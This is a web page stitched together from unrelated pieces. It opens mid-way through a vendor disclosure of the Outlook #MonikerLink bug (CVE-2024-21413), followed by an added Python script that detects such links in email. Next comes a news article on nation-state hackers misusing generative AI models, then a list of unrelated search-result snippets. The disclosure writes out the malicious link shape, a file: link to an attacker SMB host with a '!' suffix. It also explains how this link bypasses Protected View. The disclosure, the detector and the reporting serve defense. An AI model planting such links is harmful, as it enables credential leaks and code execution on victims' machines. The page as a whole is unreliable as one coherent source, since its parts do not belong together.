In fact, our in-depth analysis shows that Outlook treats the link as a “Moniker Link” (as we call it). Monikers are one of the key concepts of the Component Object Model (“COM”) on Windows. A “Moniker Link” string means the caller will use the string to look up COM objects. Please read the related linked Microsoft docs to learn more about COM and Monikers.

Technically, Outlook calls the “ole32!MkParseDisplayName()” API to do that job: parsing the Moniker Link string and using it to look up COM objects. When debugging Outlook, we could confirm that by setting a simple breakpoint on that API in WinDbg. The breakpoint is hit whenever the user clicks on the link.

According to Microsoft’s API document, the second parameter of the API “MkParseDisplayName()”, “szUserName”, is the “display name” to be parsed. Let’s check that.

We see our Moniker Link string is there (the URL protocol prefix “file:///” is removed).

Also, as explained in the API document, the “!” means this is a composite moniker: a FileMoniker based on “\\10.10.111.111\test\test.rtf”, and an ItemMoniker based on “something”.

So our test confirms that Outlook calls the MkParseDisplayName() API to look up the COM object that the Moniker Link string points to.

The Component Object Model is quite complex; it involves many concepts. But simply put, for this scenario, the caller (here, the Outlook app) just calls the COM helper APIs (here, “MkParseDisplayName()”) to do the job. How the COM object is returned, and what is returned, really depends on the target application (the “COM server”). The COM server implements and exposes certain COM Interfaces to the caller or the wrapper APIs. The process is essentially like running an external application from your application (COM is much more complex, though).

Therefore, it may cause various security problems because we don’t know what the COM server would do.

For the above example, a composite moniker made of FileMoniker + ItemMoniker, the extension name is “.rtf”, so Microsoft Word is run to look up the COM object pointed to by the Moniker Link. Word is a well-designed COM-based application. The process is basically like the following.

  • Windows runs Microsoft Word as a COM server in the background (without showing the normal Word UI).
  • In the background, Word opens and parses the file “test.rtf” pointed to by the file moniker, based on the string “\\10.10.111.111\test\test.rtf”. After that, it attempts to look up the object pointed to by the item moniker, based on the string “something”.

So this is the problem: Word opens and parses the “test.rtf” file, which sits on the attacker-controlled server and is controlled by the attacker. What if there’s a bug, such as a code execution bug, in the processing done while Word (running as a COM server) parses the test.rtf file?

We’ve successfully used an .rtf PoC and reproduced the attack. As the following shows, it crashes in the “WINWORD.EXE” process.

(note: the “crash” PoC we used is just a non-exploitable crash after Microsoft patched a previous RTF vulnerability, but it’s already enough to prove the point that the RTF file is parsed)


We could also see that the background Word process is launched as a COM server, as the highlighted function names indicate.

Even more serious, the whole process doesn’t involve the Protected View mode – the background Word process runs at the Medium integrity level. So, this attack vector even bypasses the Protected View. This makes it even easier for the attacker to gain code execution on the victim’s machine.

We’d like to highlight again that Word (RTF PoC) is just an example here, it really is. Due to the nature of the Component Object Model, it really depends on the exploited application (the COM server) and how secure the application is. The “Moniker Link” issue we’re discussing here is an attack vector that “opens the door” to the future exploitation of many applications. Some applications may not even be the default-installed ones on Windows and could be installed by users from time to time. So, there’s a pretty big attack surface opened by this attack vector.

Interestingly, there’s even a Microsoft document saying that using MkParseDisplayName() or MkParseDisplayNameEx() to parse attacker-controlled input is unsafe.

Compared to other Outlook attack vectors

Now we understand the whole process and the problems. Some readers may wonder whether this is a real concern and how it compares to other attack vectors on Outlook. That’s a good question.

We’ve released our Outlook attack vector paper, so we can answer that now. As examined and defined in our paper, the score of a single click, like this single click on a hyperlink, is 1.0.

Let’s assume the attacker has an exploit for Microsoft Word working without the Protected View (as this is the most common case). If the exploit is sent as an attachment, the attacker needs the victim to perform one double-click on the attachment (Scenario 2.2.1 in the paper). However, this is not the total because an attachment sent from an external email address would activate the Protected View on Word, and that would block the attacker’s exploit because the exploit doesn’t work when the Protected View is activated. That means the attacker needs to trick the victim into performing another single click to exit the Word Protected View mode, so that his/her exploit can run.

So, in total, that’s one double-click and one single click for the whole attack chain. The score for the user interoperability is: 1.2 + 1 = 2.2.

If the attacker delivers the exploit with the “Moniker Link” attack vector, it would be just a single click (clicking the link), and it also bypasses Protected View. So, the total score is just 1.0. It’s much better than the traditional score 2.2 (the lower the score, the better for attackers – worse for users).

So now, you can understand clearly it’s more convenient for the attacker (which means bad for user security) to deliver the Word exploit using the “Moniker Link” attack vector.

(Note: there are a few more minor requirements for the “Moniker Link” attack vector, such as the exploit needing to work with the Word COM-server mode and the victim’s network needing to allow outbound SMB traffic for external attackers)

Defense and Mitigation

We’ve confirmed this #MonikerLink bug/attack vector on the latest Windows 10/11 + Microsoft 365 (Office 2021) environments. Other Office editions/versions are likely affected, too. In fact, we believe this is an overlooked issue which existed in the Windows/COM ecosystem for decades, since it lies in the core of the COM APIs.

We’ve reported this issue to the Microsoft Security Response Center (MSRC) and they have released a critical Security Update for Outlook on the February 2024 Patch Tuesday (CVE-2024-21413) with the CVSS score of 9.8. We strongly recommend all Outlook users apply the official patch as soon as possible.

Check Point developed various protections for our customers as soon as we discovered the security vulnerability internally, and Check Point customers were protected many months ahead of this disclosure. The protections are:

  • Check Point Email Security has deployed protection for customers since October 25, 2023.
  • Check Point’s Network Research Team has developed an IPS Protection named “Microsoft Outlook Malicious Moniker Link Remote Code Execution (CVE-2024-21413)” to prevent exploitation attempts of this vulnerability. Check Point’s IPS customers have been protected from this vulnerability since Nov 15, 2023, even before its disclosure.

Check Point Research continues to monitor the activities for potential attacks exploiting this bug/attack vector in the wild through our telemetry data.
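A mail-side check for the link shape this post describes, as an added example that is not Check Point's or Microsoft's code: it pulls every href out of a message's HTML parts and reports `file:` links whose display name contains the “!” that makes it a composite moniker, split into the file part and the item part. The names `MonikerLinkFinding`, `HrefCollector`, `split_moniker` and `scan_message` are hypothetical, and the sample message is constructed from the link strings quoted in the post.

```python
import email
import email.policy
import re
from dataclasses import dataclass
from html.parser import HTMLParser
from typing import List, Optional
from urllib.parse import unquote


@dataclass
class MonikerLinkFinding:
    href: str                   # attribute value as written in the mail
    file_part: str              # text before "!": parsed as the FileMoniker
    item_part: str              # text after "!": parsed as the ItemMoniker
    remote_host: Optional[str]  # UNC host the file part points at, if any


class HrefCollector(HTMLParser):
    """Collects every href attribute value found in an HTML body."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.hrefs: List[str] = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases attribute names and unescapes entities.
        for name, value in attrs:
            if name == "href" and value:
                self.hrefs.append(value)


def split_moniker(href: str) -> Optional[MonikerLinkFinding]:
    """Return a finding if href is a file: link with a composite display name."""
    # Normalise first so the check does not depend on how the link was written.
    decoded = unquote(href.strip())
    match = re.match(r"(?i)^file:/*(.*)$", decoded)
    if match is None:
        return None                      # not a file: link at all
    # The post shows the prefix "file:///" removed before the string is parsed.
    display_name = match.group(1)
    if "!" not in display_name:
        return None                      # plain file link, no item moniker
    file_part, item_part = display_name.split("!", 1)
    unc = re.match(r"^\\\\([^\\/]+)[\\/]", file_part)
    return MonikerLinkFinding(
        href=href,
        file_part=file_part,
        item_part=item_part,
        remote_host=unc.group(1) if unc else None,
    )


def scan_message(raw_message: str) -> List[MonikerLinkFinding]:
    """Scan all text/html parts of an RFC 5322 message for composite file links."""
    msg = email.message_from_string(raw_message, policy=email.policy.default)
    findings: List[MonikerLinkFinding] = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        collector = HrefCollector()
        collector.feed(part.get_content())
        for href in collector.hrefs:
            finding = split_moniker(href)
            if finding is not None:
                findings.append(finding)
    return findings


# Constructed sample message: a web link, the plain file link from the post,
# and the modified link with "!something" appended.
SAMPLE_EML = r"""From: sender@example.test
To: user@example.test
Subject: constructed sample
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<p><a href="https://example.test/report">web link</a></p>
<p><a href="file:///\\10.10.111.111\test\test.rtf">plain file link</a></p>
<p><a href="file:///\\10.10.111.111\test\test.rtf!something">composite link</a></p>
</body></html>
"""

if __name__ == "__main__":
    for f in scan_message(SAMPLE_EML):
        print(f"composite file link -> host={f.remote_host} "
              f"file={f.file_part} item={f.item_part}")
```

Only the third link is reported; the plain `file://` link is left to the existing Outlook restriction described earlier in the post.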

The Big Picture

Essentially, this #MonikerLink bug (or attack vector) is a security risk introduced by using an unsafe API (the MkParseDisplayName/MkParseDisplayNameEx). Therefore, this security issue may well not only exist in Microsoft Outlook, but it may also exist in and affect other software that uses the APIs in an insecure way. We have just happened to discover the issue in Outlook.

Therefore, we’d like to call the security and developer communities to find and fix such bugs (attack vectors) in other software, too, as there’s just too much software in the real world. It’s fairly easy to perform the test. If you’re a QA or security engineer, you may put the Hyperlink following the format “file:///\\ip\test\test.rtf!something” somewhere into the input that the target software will process and monitor the behaviors of the target software when it processes the input. If you’re a developer, please watch out for the usages of the MkParseDisplayName/MkParseDisplayNameEx Windows APIs (and some wrapper APIs).

It’s something like the #log4j bug affecting the Java ecosystem, but this #MonikerLink bug/attack vector affects the Windows/COM ecosystem.

In this blog post, we disclosed a significant security issue in Outlook, dubbed the #MonikerLink bug. The bug not only allows the leaking of the local NTLM information, but it may also allow remote code execution and more as an attack vector. It could also bypass the Office Protected View when it’s used as an attack vector to target other Office applications. We also compared this attack vector with other attack vectors we discussed in our previously released Outlook paper and found that the risks of this issue couldn’t be simply ignored. We strongly recommend our customers and readers take appropriate actions to protect their organizations against the potential security risks it may cause. Please refer to our “Defense and Mitigation” section for more details.

With our in-depth research, we’ve also found that this #MonikerLink bug/attack vector may well not only exist in Microsoft Outlook, but it may also exist in and affect other software. We warned about the potential impact of the #MonikerLink bug in other software and encouraged the security and developer communities to find and fix such bugs.

Microsoft says US rivals are beginning to use generative AI in offensive cyber operations

FILE - A logo of Microsoft is displayed during an event at the Chatham House think tank in London, Jan. 15, 2024. Microsoft said Wednesday that U.S. adversaries are beginning to use generative artificial intelligence to mount or organize offensive cyber operations. (AP Photo/Kin Cheung, File)


BOSTON (AP) — Microsoft said Wednesday that U.S. adversaries — chiefly Iran and North Korea and to a lesser extent Russia and China — are beginning to use its generative artificial intelligence to mount or organize offensive cyber operations.

The technology giant and business partner OpenAI said they had jointly detected and disrupted the malicious cyber actors’ use of their AI technologies — shutting down their accounts.

In a blog post, Microsoft said the techniques employed were “early-stage” and neither “particularly novel or unique” but it was important to expose them publicly as U.S. adversaries leverage large-language models to expand their ability to breach networks and conduct influence operations.

Cybersecurity firms have long used machine-learning on defense, principally to detect anomalous behavior in networks. But criminals and offensive hackers use it as well, and the introduction of large-language models led by OpenAI’s ChatGPT upped that game of cat-and-mouse.

Microsoft has invested billions of dollars in OpenAI, and Wednesday’s announcement coincided with its release of a report noting that generative AI is expected to enhance malicious social engineering, leading to more sophisticated deepfakes and voice cloning. A threat to democracy in a year where over 50 countries will conduct elections, magnifying disinformation and already occurring,

Here are some examples Microsoft provided. In each case it said all generative AI accounts and assets of the named groups were disabled:

— The North Korean cyberespionage group known as Kimsuky has used the models to research foreign think tanks that study the country, and to generate content likely to be used in spear-phishing hacking campaigns.

— Iran’s Revolutionary Guard has used large-language models to assist in social engineering, in troubleshooting software errors, and even in studying how intruders might evade detection in a compromised network. That includes generating phishing emails “including one pretending to come from an international development agency and another attempting to lure prominent feminists to an attacker-built website on feminism.” The AI helps accelerate and boost the email production.

— The Russian GRU military intelligence unit known as Fancy Bear has used the models to research satellite and radar technologies that may relate to the war in Ukraine.

— The Chinese cyberespionage group known as Aquatic Panda — which targets a broad range of industries, higher education and governments from France to Malaysia — has interacted with the models “in ways that suggest a limited exploration of how LLMs can augment their technical operations.”

— The Chinese group Maverick Panda, which has targeted U.S. defense contractors among other sectors for more than a decade, had interactions with large-language models suggesting it was evaluating their effectiveness as a source of information “on potentially sensitive topics, high profile individuals, regional geopolitics, US influence, and internal affairs.”

In a separate blog published Wednesday, OpenAI said its current GPT-4 model chatbot offers “only limited, incremental capabilities for malicious cybersecurity tasks beyond what is already achievable with publicly available, non-AI powered tools.”

Cybersecurity researchers expect that to change.

Last April, the director of the U.S. Cybersecurity and Infrastructure Security Agency, Jen Easterly, told Congress that “there are two epoch-defining threats and challenges. One is China, and the other is artificial intelligence.”

Easterly said at the time that the U.S. needs to ensure AI is built with security in mind.

Critics of the public release of ChatGPT in November 2022 — and subsequent releases by competitors including Google and Meta — contend it was irresponsibly hasty, considering security was largely an afterthought in their development.

“Of course bad actors are using large-language models — that decision was made when Pandora’s Box was opened,” said Amit Yoran, CEO of the cybersecurity firm Tenable.

Some cybersecurity professionals complain about Microsoft’s creation and hawking of tools to address vulnerabilities in large-language models when it might more responsibly focus on making them more secure.

“Why not create more secure black-box LLM foundation models instead of selling defensive tools for a problem they are helping to create?” asked Gary McGraw, a computer security veteran and co-founder of the Berryville Institute of Machine Learning.

NYU professor and former AT&T Chief Security Officer Edward Amoroso said that while the use of AI and large-language models may not pose an immediately obvious threat, they “will eventually become one of the most powerful weapons in every nation-state military’s offense.”

FRANK BAJAK


COMMENTS

  1. Microsoft New Future of Work Report 2022

    Microsoft New Future of Work Report 2022 Jaime Teevan, Nancy Baym, Jenna Butler, Brent Hecht, Sonia Jaffe, Kate Nowak, Abigail Sellen, Longqi Yang, Marcus Ash, Kagonya Awori, Mia Bruch, Piali Choudhury, Adam Coleman, Scott Counts, Shiraz Cupala, Mary Czerwinski, Ed Doran, Elizabeth Fetterolf, Mar Gonzalez Franco, Kunal Gupta,

  2. Microsoft Research

    February 7, 2024 Explore Microsoft Research Health Futures AI Frontiers: AI for health and the future of research with Peter Lee March 30, 2023 | Peter Lee, Ashley Llorens GPT-4's potential in shaping the future of radiology November 27, 2023 | Javier Alvarez-Valle, Matthew Lungren

  3. Publications index

    Below is an index of publications written by Microsoft researchers, often in collaboration with the academic community.

  4. Microsoft New Future of Work Report 2023

    Microsoft New Future of Work Report 2023 - Microsoft Research Jenna Butler, Sonia Jaffe, Nancy Baym, Mary Czerwinski, Shamsi Iqbal, Kate Nowak, Sean Rintel, Abigail Sellen, Mihaela Vorvoreanu, Najeeb G. Abdulhamid, Judith Amores, Reid Andersen, Kagonya Awori, Maxamed Axmed, danah boyd,

  5. PDF Microsoft New Future of Work Report 2022

    This Microsoft New Future of Work Report 2022 summarizes important recent research developments related to hybrid work. It highlights themes that have emerged in the findings of the past year and brings to the fore older research that has become newly relevant.

  6. Microsoft releases findings and considerations from one year of remote

    REDMOND, Wash. — March 22, 2021 — Microsoft Corp. on Monday announced findings from its first-annual Work Trend Index. Titled "The Next Great Disruption Is Hybrid Work — Are We Ready?" the report uncovers seven hybrid work trends every business leader must know as we enter a new era of work.

  7. About Microsoft Research

    We are rigorous and objective: since its founding in 1991, Microsoft Research has been committed to an academic research approach that advances our understanding of the world and how we use technology to interact with it, and with each other.

  8. MSFT: Microsoft

    General Information Microsoft Corporation ONE MICROSOFT WAY REDMOND, WA 98052 Phone: 425-882-8080 Fax: 425-706-7329 Web: http://www.microsoft.com Email: [email protected] EPS Information...

  9. The effects of remote work on collaboration among information ...

    We found that, on average, firm-wide remote work decreased the number of bridging ties by 0.09 FV ( P < 0.001, 95% CI = 0.06-0.13) and the share of time with bridging ties by 0.41 FV ( P < 0.001 ...

  10. Microsoft and LinkedIn share latest data and innovation for hybrid work

    Because in uncharted territory, we need to be able to shift and adjust as data and research offer new insights to guide our way. The Hybrid Work Paradox and the 'Great Reshuffle' A report out today on our Work Trend Index shares what we're learning from Microsoft employees in over 100 countries around the world. Employee surveys tell us ...

  11. New study validates the business value and opportunity of AI

    The study, which builds on the results from Microsoft's Work Trend Index focused on workplace productivity, examines how companies are monetizing their AI investments, from generating new revenue streams to delivering differentiated customer experiences, to modernizing internal processes. Key findings from this study show*:

  12. Staying ahead of threat actors in the age of AI

    Microsoft, in collaboration with OpenAI, is publishing research on emerging threats in the age of AI, focusing on identified activity associated with known threat actors Forest Blizzard, Emerald Sleet, Crimson Sandstorm, and others. The observed activity includes prompt-injections, attempted misuse of large language models (LLM), and fraud.

  13. Defending Ukraine: Early Lessons from the Cyber War

    Editor's note: Today Microsoft published a new intelligence report, Defending Ukraine: Early Lessons from the Cyber War. This report represents research conducted by Microsoft's threat intelligence and data science teams with the goal of sharpening our understanding of the threat landscape in the ongoing war in Ukraine. The report also ...

  14. Microsoft Research Forum

    Episode 1 on demand Previously aired on January 30, 2024 Generative AI is continuing to find new applications across business and the sciences, and researchers are continuing to advance the foundations of AI.

  15. MSFT

    Overview Per-Share Earnings, Actuals & Estimates Microsoft Corp. Quarterly Annual

  16. Bing research resources

    Microsoft Research. Microsoft Research Publications. This page provides a list of publications written by Microsoft researchers, often in collaboration with the academic community. ... Microsoft Reports Hub. The Reports Hub provides a single source for key reports and resources across our environmental, social, and governance efforts. The ...

  17. Microsoft Corporation (MSFT) Stock Research & Reports

    Microsoft Corporation (MSFT) Stock Research & Reports - Yahoo Finance

  18. Analyst Reports, E-Books, and White Papers

    Five Steps to Modernizing Your Data

  19. Cyber Signals: Navigating cyberthreats and ...

    Vasu Jakkal, Corporate Vice President, Security, Compliance, Identity, and Management. The world of cybersecurity is undergoing a massive transformation. Artificial intelligence (AI) is at the forefront of this change, and has the potential to empower organizations to defeat cyberattacks at machine speed, address the cyber talent shortage and drive innovation and efficiency in cyber security.

  20. PDF Textbooks Are All You Need

    Microsoft Research Abstract We introduce phi-1, a new large language model for code, with significantly smaller size than competing models: phi-1 is a Transformer-based model with 1.3B parameters, trained for 4 days on 8 A100s, using a selection of "textbook quality" data from the web (6B tokens) and synthetically

  21. PDF Textbooks Are All You Need II: phi-1.5 technical report

    Microsoft Research Abstract We continue the investigation into the power of smaller Transformer-based language models as initiated by TinyStories - a 10 million parameter model that can produce coherent English - and the follow-up work on phi-1, a 1.3 billion parameter model with Python coding performance close to the state-of-the-art.

  22. Microsoft Research

    Microsoft Research. 187,362 followers. 3w. Interdisciplinary research can drive real-world impact. Join the new Microsoft Research AI & Society Fellows program, uniting eminent scholars and ...

  23. Combating abusive AI-generated content: a comprehensive approach

    A strong safety architecture. We are committed to a comprehensive technical approach grounded in safety by design. Depending on the scenario, a strong safety architecture needs to be applied at the AI platform, model, and applications levels. It includes aspects such as ongoing red team analysis, preemptive classifiers, the blocking of abusive ...

  24. PDF Sébastien Bubeck Varun Chandrasekaran Ronen Eldan Johannes Gehrke

    Microsoft Research Abstract Artificial intelligence (AI) researchers have been developing and refining large language models (LLMs) ... In this paper, we report on our investigation of an early version of GPT-4, when it was still in active development by OpenAI. We contend that (this early version of) GPT-

  25. PDF Microsoft Attention Spans Research Report

    Microsoft attention spans, Spring 2015 | @msadvertisingca #msftattnspans "[What information consumes is] the attention of its recipients. Hence a wealth of information creates a poverty of attention." - Herbert Simon Nobel winner, Economics (1978) Theory: brain plasticity The goal for this research is to understand what impact technology

  26. [2402.05929] An Interactive Agent Foundation Model

    The development of artificial intelligence systems is transitioning from creating static, task-specific models to dynamic, agent-based systems capable of performing well in a wide range of applications. We propose an Interactive Agent Foundation Model that uses a novel multi-task agent training paradigm for training AI agents across a wide range of domains, datasets, and tasks. Our training ...

  27. Paper and report design and layout templates

    Your papers and reports will look as professional and well put together as they sound when you compose them using customizable Word templates. Whether you're writing a research paper for your university course or putting together a high priority presentation, designer-created templates are here to help you get started. First impressions are important, even for papers, and layout can make or ...

  28. The Risks of the #MonikerLink Bug in Microsoft Outlook and the Big

    Introduction. Recently, Check Point Research released a white paper titled "The Obvious, the Normal, and the Advanced: A Comprehensive Analysis of Outlook Attack Vectors", detailing various attack vectors on Outlook to help the industry understand the security risks the popular Outlook app may bring into organizations. As mentioned in the paper, we discovered an interesting security issue ...

  29. Microsoft says US rivals are beginning to use generative AI in

    Here are some examples Microsoft provided. In each case it said all generative AI accounts and assets of the named groups were disabled: — The North Korean cyberespionage group known as Kimsuky has used the models to research foreign think tanks that study the country, and to generate content likely to be used in spear-phishing hacking campaigns.